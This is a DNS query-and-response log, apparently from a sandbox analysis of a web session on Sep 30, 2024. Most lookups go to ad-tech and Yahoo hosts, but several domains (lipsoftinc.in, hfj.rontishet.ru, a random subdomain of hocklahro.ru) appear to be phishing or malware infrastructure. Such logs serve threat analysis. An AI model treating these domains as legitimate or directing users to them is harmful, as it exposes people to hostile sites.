                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.106591940 CEST192.168.2.41.1.1.10xe869Standard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.107089043 CEST192.168.2.41.1.1.10xd6e9Standard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.107240915 CEST192.168.2.41.1.1.10xca89Standard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.111047983 CEST192.168.2.41.1.1.10xbd5aStandard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.111222029 CEST192.168.2.41.1.1.10x2b9aStandard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.498804092 CEST192.168.2.41.1.1.10xd0ecStandard query (0)cs.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.499051094 CEST192.168.2.41.1.1.10xcfc4Standard query (0)cs.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.976816893 CEST192.168.2.41.1.1.10xda73Standard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:13.976948977 CEST192.168.2.41.1.1.10xd06dStandard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.030783892 CEST192.168.2.41.1.1.10x3253Standard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.030946016 CEST192.168.2.41.1.1.10xd10cStandard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.415941000 CEST192.168.2.41.1.1.10x7142Standard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.416178942 CEST192.168.2.41.1.1.10x2286Standard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.422080040 CEST192.168.2.41.1.1.10x9d69Standard query (0)contextual.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:14.422190905 CEST192.168.2.41.1.1.10x67deStandard query (0)contextual.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.393677950 CEST192.168.2.41.1.1.10x71c7Standard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.393826008 CEST192.168.2.41.1.1.10x5a44Standard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.624355078 CEST192.168.2.41.1.1.10x3297Standard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.624855995 CEST192.168.2.41.1.1.10x595aStandard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.625796080 CEST192.168.2.41.1.1.10xdf9bStandard query (0)rtb.mfadsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:15.625967979 CEST192.168.2.41.1.1.10xcefbStandard query (0)rtb.mfadsrvr.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:18.093034029 CEST192.168.2.41.1.1.10x5adStandard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:18.093590021 CEST192.168.2.41.1.1.10x58Standard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.694659948 CEST192.168.2.41.1.1.10xa9aaStandard query (0)ssc-cms.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:42.694659948 CEST192.168.2.41.1.1.10xa266Standard query (0)ssc-cms.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:43.351906061 CEST192.168.2.41.1.1.10xe7bbStandard query (0)de.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:43.352087975 CEST192.168.2.41.1.1.10xd086Standard query (0)de.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:44.017962933 CEST192.168.2.41.1.1.10x795dStandard query (0)hde.tynt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:44.018273115 CEST192.168.2.41.1.1.10x9630Standard query (0)hde.tynt.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.104907036 CEST192.168.2.41.1.1.10x17b7Standard query (0)secure-assets.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.104907036 CEST192.168.2.41.1.1.10xe803Standard query (0)secure-assets.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.108509064 CEST192.168.2.41.1.1.10x8e92Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.108861923 CEST192.168.2.41.1.1.10xc9fcStandard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.111412048 CEST192.168.2.41.1.1.10x7e74Standard query (0)ups.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.111412048 CEST192.168.2.41.1.1.10x41a6Standard query (0)ups.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.115628958 CEST192.168.2.41.1.1.10x4b00Standard query (0)cs.krushmedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.115955114 CEST192.168.2.41.1.1.10x4756Standard query (0)cs.krushmedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.706517935 CEST192.168.2.41.1.1.10x8b0fStandard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.706825972 CEST192.168.2.41.1.1.10xbb40Standard query (0)ads.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.999712944 CEST192.168.2.41.1.1.10x9ecaStandard query (0)gw-iad-bid.ymmobi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:45.999876976 CEST192.168.2.41.1.1.10xda14Standard query (0)gw-iad-bid.ymmobi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.072046041 CEST192.168.2.41.1.1.10x996aStandard query (0)eus.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.072244883 CEST192.168.2.41.1.1.10x40cfStandard query (0)eus.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.564002991 CEST192.168.2.41.1.1.10x4ce7Standard query (0)events-ssc.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:46.564258099 CEST192.168.2.41.1.1.10x3b02Standard query (0)events-ssc.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.030730009 CEST192.168.2.41.1.1.10x93c0Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.033920050 CEST192.168.2.41.1.1.10x7759Standard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.083250999 CEST192.168.2.41.1.1.10x5f7Standard query (0)cs.iqzone.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.083910942 CEST192.168.2.41.1.1.10x7a34Standard query (0)cs.iqzone.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.087235928 CEST192.168.2.41.1.1.10xe00dStandard query (0)33across-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.087235928 CEST192.168.2.41.1.1.10xe12aStandard query (0)33across-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.500186920 CEST192.168.2.41.1.1.10x64c8Standard query (0)events-ssc.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.500333071 CEST192.168.2.41.1.1.10xfecdStandard query (0)events-ssc.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.768493891 CEST192.168.2.41.1.1.10x68c4Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.768868923 CEST192.168.2.41.1.1.10x25bcStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.770169973 CEST192.168.2.41.1.1.10x4d63Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:47.770309925 CEST192.168.2.41.1.1.10xab66Standard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.154002905 CEST192.168.2.41.1.1.10x7c67Standard query (0)pixel-us-east.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.154267073 CEST192.168.2.41.1.1.10x3d2fStandard query (0)pixel-us-east.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.187349081 CEST192.168.2.41.1.1.10xde57Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:48.187936068 CEST192.168.2.41.1.1.10xb57Standard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.068247080 CEST192.168.2.41.1.1.10xc715Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:50.068794012 CEST192.168.2.41.1.1.10x7b33Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:54.004168987 CEST192.168.2.41.1.1.10xfb19Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:23:54.005409956 CEST192.168.2.41.1.1.10xc435Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:17.380522013 CEST1.1.1.1192.168.2.40xcfd1No error (0)lipsoftinc.in69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.148127079 CEST1.1.1.1192.168.2.40x520fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.148127079 CEST1.1.1.1192.168.2.40x520fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.148473024 CEST1.1.1.1192.168.2.40x97a7No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.162295103 CEST1.1.1.1192.168.2.40xd61dNo error (0)lipsoftinc.in69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.975047112 CEST1.1.1.1192.168.2.40xf298No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.975047112 CEST1.1.1.1192.168.2.40xf298No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:18.975164890 CEST1.1.1.1192.168.2.40x9fabNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.096730947 CEST1.1.1.1192.168.2.40xa880No error (0)href.li192.0.78.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.096730947 CEST1.1.1.1192.168.2.40xa880No error (0)href.li192.0.78.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:19.912502050 CEST1.1.1.1192.168.2.40xb4e5No error (0)hfj.rontishet.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:20.959501982 CEST1.1.1.1192.168.2.40x6b85No error (0)hfj.rontishet.ru172.67.147.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:20.959501982 CEST1.1.1.1192.168.2.40x6b85No error (0)hfj.rontishet.ru104.21.79.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:22.534017086 CEST1.1.1.1192.168.2.40x74fbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:22.534141064 CEST1.1.1.1192.168.2.40x7314No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.876502991 CEST1.1.1.1192.168.2.40xbcb3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.876502991 CEST1.1.1.1192.168.2.40xbcb3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.876502991 CEST1.1.1.1192.168.2.40xbcb3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.876502991 CEST1.1.1.1192.168.2.40xbcb3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.878439903 CEST1.1.1.1192.168.2.40x313aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.878748894 CEST1.1.1.1192.168.2.40xfa7bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.878748894 CEST1.1.1.1192.168.2.40xfa7bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.878987074 CEST1.1.1.1192.168.2.40x15bfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.878987074 CEST1.1.1.1192.168.2.40x15bfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:23.882716894 CEST1.1.1.1192.168.2.40x237cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.052958012 CEST1.1.1.1192.168.2.40xb0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.052958012 CEST1.1.1.1192.168.2.40xb0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.052958012 CEST1.1.1.1192.168.2.40xb0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.052958012 CEST1.1.1.1192.168.2.40xb0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.250026941 CEST1.1.1.1192.168.2.40x712fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.250026941 CEST1.1.1.1192.168.2.40x712fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.250056028 CEST1.1.1.1192.168.2.40x79c7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.284471035 CEST1.1.1.1192.168.2.40xfa03No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.284483910 CEST1.1.1.1192.168.2.40x9560No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:26.284483910 CEST1.1.1.1192.168.2.40x9560No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:28.000663042 CEST1.1.1.1192.168.2.40xba56No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:51.316632986 CEST1.1.1.1192.168.2.40xe9b8No error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:51.377568960 CEST1.1.1.1192.168.2.40xee6aNo error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru104.21.93.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:51.377568960 CEST1.1.1.1192.168.2.40xee6aNo error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru172.67.208.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com74.6.231.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com98.137.11.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com74.6.231.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com98.137.11.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com74.6.143.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.210856915 CEST1.1.1.1192.168.2.40xa0b4No error (0)yahoo.com74.6.143.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.270576000 CEST1.1.1.1192.168.2.40x51deNo error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru172.67.208.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.270576000 CEST1.1.1.1192.168.2.40x51deNo error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru104.21.93.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.306653976 CEST1.1.1.1192.168.2.40xd214No error (0)ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.957104921 CEST1.1.1.1192.168.2.40x5dfeNo error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.957104921 CEST1.1.1.1192.168.2.40x5dfeNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.957104921 CEST1.1.1.1192.168.2.40x5dfeNo error (0)me-ycpi-cf-www.g06.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:53.958822012 CEST1.1.1.1192.168.2.40x6337No error (0)www.yahoo.comme-ycpi-cf-www.g06.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.286192894 CEST1.1.1.1192.168.2.40x9bcbNo error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.286192894 CEST1.1.1.1192.168.2.40x9bcbNo error (0)geo-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.287132025 CEST1.1.1.1192.168.2.40x4922No error (0)geo.yahoo.comgeo-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.287556887 CEST1.1.1.1192.168.2.40x1752No error (0)geo.query.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.287556887 CEST1.1.1.1192.168.2.40x1752No error (0)udc-ats.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.288101912 CEST1.1.1.1192.168.2.40x3c9No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.288346052 CEST1.1.1.1192.168.2.40xbba4No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.288346052 CEST1.1.1.1192.168.2.40xbba4No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.288346052 CEST1.1.1.1192.168.2.40xbba4No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.297569990 CEST1.1.1.1192.168.2.40x2913No error (0)geo.query.yahoo.comudc-ats.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.297668934 CEST1.1.1.1192.168.2.40xaca6No error (0)search.yahoo.comds-global3.l7.search.ystg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.297668934 CEST1.1.1.1192.168.2.40xaca6No error (0)ds-global3.l7.search.ystg1.b.yahoo.com212.82.100.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.298331976 CEST1.1.1.1192.168.2.40x7e1cNo error (0)search.yahoo.comds-global3.l7.search.ystg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.911083937 CEST1.1.1.1192.168.2.40x211dNo error (0)consent.cmp.oath.comcs550162656.adn.psicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.911083937 CEST1.1.1.1192.168.2.40x211dNo error (0)cs550162656.adn.psicdn.net152.195.53.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:55.911475897 CEST1.1.1.1192.168.2.40x2af6No error (0)consent.cmp.oath.comcs550162656.adn.psicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.238301992 CEST1.1.1.1192.168.2.40x805cNo error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.238301992 CEST1.1.1.1192.168.2.40x805cNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.238301992 CEST1.1.1.1192.168.2.40x805cNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.238599062 CEST1.1.1.1192.168.2.40x9470No error (0)edge-mcdn.secure.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:20:56.654304981 CEST1.1.1.1192.168.2.40x1e57No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
